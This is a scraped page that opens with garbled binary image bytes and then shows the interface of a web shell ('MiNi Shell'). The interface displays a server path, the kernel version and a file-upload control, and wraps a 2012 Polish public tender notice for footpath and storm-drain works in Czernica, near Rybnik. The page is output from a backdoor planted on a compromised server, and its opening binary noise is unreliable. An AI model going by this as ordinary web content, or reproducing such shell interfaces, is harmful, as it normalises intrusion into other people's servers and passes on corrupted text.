JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/202318-N-2012.html

<p class="kh_header"><b>Rybnik: Przebudowa ciągu pieszego z odwodnieniem  w ciągu drogi powiatowej 5025S na odcinku ulicy Wolności w Czernicy .</b><br>
<b>Numer ogłoszenia: 202318 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 032 4227478, 4227874, faks 032 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągu pieszego z odwodnieniem  w ciągu drogi powiatowej 5025S na odcinku ulicy Wolności w Czernicy ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  kontynuacja przebudowy ciągu pieszego z odwodnieniem  w ciągu drogi powiatowej 5025S na odcinku ulicy Wolności w Czernicy  od  km umownego  wg dokumentacji projektowej  0+256  do końca        - z wyciągu zatwierdzonej  dokumentacji   projektowej . Załączoną dokumentację należy czytać w km 0+256-0+425 w zakresie chodnika i km 0+256 do końca w zakresie kanalizacji deszczowej                       .
Przebieg projektowanego chodnika przedstawiono na planie sytuacyjnym w skali 1:1000 .


    Zakres robót obejmuje m.in. :
    
   ODWODNIENIE :
-   rozbiórkę nawierzchni z mas mineralno - asfaltowych                -     12,07 m2
-   rozebranie podbudowy z kruszywa sposobem ręcznym             -     12,07 m2
-   wykopy liniowe o szer. 0,8-2,5 m i głęb. 1,5 m                            -      25,5 m3
-   wykopy liniowe o szer. 0,8-2,5 m i głęb. 3,0 m                            -    196,6 m3
-   odkopanie istniejącego kanału deszczowego                             -       21,9 m3
-   pełne  umocnienia ścian   wykopów                                            -     502,4 m2
-   demontaż rurociągu betonowego o śred. 400 mm                      -       96,0 m
-   podłoże z materiałów sypkich grub. 15 cm                                  -       29,5 m3
-   montaż kanału z rur PCV o średnicy zewnętrznej 315mm       
    wraz z  ułożeniem sączka PVC perforowanego śred. 100 mm,
   owiniętego geowłókniną                                                       -     192,0 m
-   montaż kanału z rur PCV o średnicy zewnętrznej 200 mm         -       16,0 m
-   demontaż istniejących studni                                                       -      2,0 szt.
-   wykonanie typowych studni rewizyjnych śred. 1000 mm             -      7,0 szt.
-   wykonanie typowych studni ściekowych z podłączeniem
    do studni rewizyjnych                                                                   -     5,0 szt.
-   zasypanie wykopów o szer. 0,8-2,5 m , głęb. wykopu do 1,5m    -  21,58 m3                                                                     
-   zasypanie wykopów o szer. 0,8-2,5 m , głęb. wykopu do 3,0m 
    na wys. 30 cm ponad wierzch rury piaskiem                               -  103,07 m3    
 -  zasypanie wykopów o szer. 0,8-2,5 m , głęb. wykopu do 3,0m 
    gruntem rodzimym                                                                        -   67,8  m3  
-   roboty ziemne z przewozem taczkami                                         -    67,8  m3  
-   ręczne formowanie nasypów                                                        -   25,9 m3
-   zagęszczenie nasypów                                                                 -   25,9 m3
-   podbudowa dolna 25cm + górna 15cm z kruszywa łamanego     -   12,7 m2
-   nawierzchnia z mieszanki mineralno - bitum. grub. 10 cm          -    12,7 m2
-   roboty ziemne - wywóz nadmiaru ziemi                                       -  128,8 m3


CHODNIK:
-   roboty pomiarowe przy liniowych robotach ziemnych                  -   0,169 km
-   mechaniczne cięcie szczelin w nawierzchni z mas min.bit.         -    183,6 m
-   rozbiórka elementów dróg - naw. bitum, krawężniki,podbudowa       23,09 m3
-   koryto głęb. 30 cm                                                                       -      314,8 m2
-   roboty ziemne koparkami o poj. łyżki 0,6 m3  z transp. urobku   -       149,0 m3
-   ława betonowa z oporem pod krawężnik                                      -    10,94m3
-   krawężnik betonowy o wym. 15  30 cm na pods. pias.-cement.   -    189,0 m
-   obrzeża betonowe o wymiarach 8x 30 cm                                    -    149,0m
-   podbudowa z tłucznia kamiennego pod chodnik grub. 15 cm      -     243,6m2
-   chodnik z kostki betonowej brukowej grub. 6 cm                         -     208,6m2
-   chodnik z kostki betonowej brukowej grub. 8 cm                         -      34,0m2
-   w-wa odsączająca z piasku, grub. w-wy 15 cm                            -     42,7m2
-   podbudowa beton. na poszerzeniu jezdni grub. 25 cm , beton B-15  42,7 m3
-   skropienie nawierzchni asfaltem drogowym                                 -     42,7 m2
-   nawierzchnia z mieszanki min.asfalt. w-wa wiążąca grub. 4 cm   -    42,7m2
-   nawierzchnia   z mieszanki min.asfalt. w-wa ścieralna grub. 5 cm  -  42,7m2   

WYLOT KANALIZACJI
-   umocnienie skarp i dna kanałów płytami prefabrykowanymi          - 48,0m2
-   ścianka czołowa przepustu                                                             - 1 szt.
-   obudowa wylotu z betonu                                                               - 1 szt.

Konstrukcja chodnika:
- nawierzchnia z kostki betonowej brukowej grubości 6cm szarej, a przy krawężniku i obrzeżu na szerokość  20cm kostka 
  kolorowa grafitowa- podsypka piaskowo-cementowa 4:1 grubości 4cm
- podbudowa z kruszywa łamanego niesortowanego grubości 15cm

Konstrukcja chodnika na wjazdach:
- nawierzchnia z kostki betonowej brukowej kolorowej czerwonej grubości 8cm
- podsypka piaskowo-cementowa 4:1 grubości 4cm
- podbudowa z kruszywa łamanego niesortowanego grubości 15cm
- na zakończeniu wjazdu krawężnik betonowy 15x30 ułożony na płask na ławie  betonowej 
Krawężniki i obrzeża:
Od strony jezdni krawężnik betonowy 15x30 uliczny układany na podsypce piaskowo-cementowej 4:1 grubości 5cm
i ławie betonowej z oporem o objętości betonu 0,06m3/mb. Na całej długości krawężnik odsunięty będzie od krawędzi jezdni. Na poszerzeniu pomiędzy jezdnią , a krawężnikiem, podbudowę  należy wykonać z betonu B-15 głęb. 25cm , a następnie warstwę wiążącą z mieszanki min. asfaltowej grub. 4 cm i warstwę ścieralną z betonu asfaltowego grub. 5 cm.. Wysokość posadowienia krawężnika wynosi 12cm, na wjazdach do posesji 4cm , a na przejściach dla pieszych 2cm. Obrzeże betonowe 8x30cm układane po stronie zewnętrznej chodnika  za wyjątkiem wjazdów do bram na podsypce piaskowej12x3cm.
Odwodnienie jezdni obejmuje wykonanie:
- wykonanie kolektora kanalizacji deszczowej z rur PCV fi315mm  , kolektor ułożony na  podłożu z piasku grubości 15cm 
  w wykopie o ścianach pionowych umocnionych . Długość kolektora z rur PCV O315mm  wynosi  190,0 mb.
  Wzdłuż kanału należy ułożyć sączek PVC perforowany śred. 100 mm, owinięty geowłókniną . Sączek należy włączyć             
  do  studni rewizyjnych.
- studni rewizyjnych O1000mm w ilości  7szt. , przykryte płytą żelbetową  O1200mm z  żeliwnym włazem ulicznym typu  
  ciężkiego klasy C
- studzienki  ściekowe O500mm  z osadnikiem bez syfonu z kręgów betonowych posadowionych na fundamencie   
  grubości 15cm z betonu klasy B-15 (lub płyta denna) na podsypce piaskowej grubości 7cm, przykrytych wpustem 
  ulicznym typu ciężkiego wraz z pierścieniem  odciążającym i podtrzymującym wpust
- przykanaliki O200mm z rur PCV łączące studzienki  ściekowe ze studniami rewizyjnymi ułożone na podłożu z piasku 
  grubości 15cm w wykopie o ścianach pionowych umocnionych ażurowo.
 Wody deszczowe odprowadzane będą do istniejącego rowu melioracyjnego przez umocniony wylot W1.

 Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu oraz technologii wykonania i odbioru robót zawierają: dokumentacja projektowa, przedmiar robót oraz szczegółowe specyfikacje techniczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.22-1, 45.23.24.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca  wykaże , że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w  postępowaniu, a jeżeli okres prowadzenia  działalności  jest  krótszy - w tym okresie  wykonał  co najmniej :  1  zamówienie  o wartości co najmniej  150  000,00 złotych brutto  polegające na wykonaniu remontu  , przebudowy bądź budowy chodnika lub innego obiektu o nawierzchni z kostki betonowej wraz  z kanalizacją deszczową.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku , jeżeli Wykonawca  wykaże , że ma do dyspozycji osobę do pełnienia funkcji kierownika budowy  odpowiedzialną za kierowanie  robotami   budowlanymi , posiadającą  odpowiednie uprawnienia do kierowania robotami budowlanymi w specjalności drogowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu  z art. 22 ustawy Pzp na lub wg druku
     Załącznika nr  5 do siwz.
2. Pełnomocnictwo do podpisania oferty względnie do podpisania innych dokumentów składanych wraz z ofertą , 
    o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.
3. Kosztorys ofertowy.
4. Zobowiązanie pisemne i dokumenty określone w  p.15.3,15.4 siwz w przypadku , gdy Wykonawca ubiegający się o udzielenie zamówienia korzysta z zasobów  innych podmiotów:</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych 
         przypadkach :
-       przedłużenia procedury przetargowej,
-       niesprzyjających  wykonywaniu prac  zgodnie ze sztuką budowlaną  warunków atmosferycznych  ( np. 
        nawodnienie    gruntu    spowodowane intensywnymi opadami deszczu , zmarznięty grunt itp.),
-      warunków geotechnicznych, których nie można było przewidzieć,
-       wystąpienia konieczności prowadzenia uzgodnień z właścicielami urządzeń obcych lub właścicielami      
        nieruchomości,
-       w przypadku wystąpienia kolizji z nie zinwentaryzowanym uzbrojeniem podziemnym , w tym w przypadku  
        ujawnienia     potrzeby przebudowy lub zabezpieczenia takiego uzbrojenia  wynikającego z jego stanu 
        technicznego bądź  nie   zachowania odległości ,
       -      w przypadku konieczności na etapie wykonawstwa dokonania zmian  w  projekcie i uzyskania odpowiednich 
               decyzji  i  pozwoleń ,
       -      w przypadku wystąpienia innych sytuacji niezależnych od Zamawiającego np. zasadnych wniosków 
              mieszkańców  powodujących konieczność wykonania prac  niezbędnych  dla  właściwego wykonania 
               przedmiotu  zamówienia .
       -       działania sił natury uznanych za klęskę żywiołową.
  2.      Zmiana terminu wykonania umowy może nastąpić wyłącznie aneksem do umowy, tylko o ilość dni które 
           zostaną   udokumentowane.
     3.     Wykonawca nie będzie miał prawa do przedłużenia terminu wykonania umowy , jeżeli przedłużenie terminu 
              wynika  z  przyczyn leżących po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych , 44-200 Rybnik , ul. Jankowicka 49, pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 08:30, miejsce: siedziba Zarządu Dróg Powiatowych w Rybniku , 44-200 Rybnik , ul. Jankowicka 49 , pok. 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com